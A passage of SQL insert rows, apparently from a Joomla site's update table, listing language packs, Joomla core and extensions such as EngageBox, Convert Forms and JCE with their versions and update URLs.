(1797, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1798, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1799, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1800, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1801, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1802, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1803, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1804, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1805, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1806, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1807, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1808, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1809, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1810, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1811, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1812, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1813, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1814, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1815, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1816, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(1817, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1818, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1819, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1820, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1821, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1822, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1823, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1824, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1825, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1826, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1827, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1828, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1829, 14, 0, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.1', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=524', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1830, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1831, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(1832, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1833, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1834, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1835, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1836, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1837, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1838, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1839, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1840, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1841, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1842, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1843, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1844, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1845, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1846, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1847, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.2', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1848, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1849, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1850, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1851, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1852, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1853, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1854, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1855, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1856, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1857, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1858, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1859, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1860, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1861, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1862, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1863, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1864, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1865, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1866, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1867, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1868, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1869, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(1870, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1871, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1872, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1873, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1874, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1875, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1876, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1877, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1878, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1879, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1880, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1881, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1882, 14, 0, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.1', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=524', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1883, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1884, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(1885, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1886, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1887, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1888, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1889, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1890, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1891, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1892, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1893, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1894, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1895, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1896, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.2', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1897, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1898, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1899, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1900, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1901, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1902, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1903, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1904, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1905, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1906, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1907, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1908, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1909, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1910, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1911, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1912, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1913, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1914, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1915, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1916, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1917, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1918, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(1919, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1920, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1921, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1922, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1923, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1924, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1925, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1926, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1927, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1928, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1929, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1930, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1931, 14, 0, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.1', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=524', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1932, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1933, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(1934, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1935, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1936, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1937, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1938, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1939, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1940, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1941, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1942, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1943, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1944, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1945, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1946, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1947, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1948, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.2', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1949, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1950, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1951, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1952, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1953, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1954, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1955, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1956, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1957, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1958, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1959, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1960, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1961, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1962, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1963, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1964, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1965, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1966, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1967, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1968, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1969, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
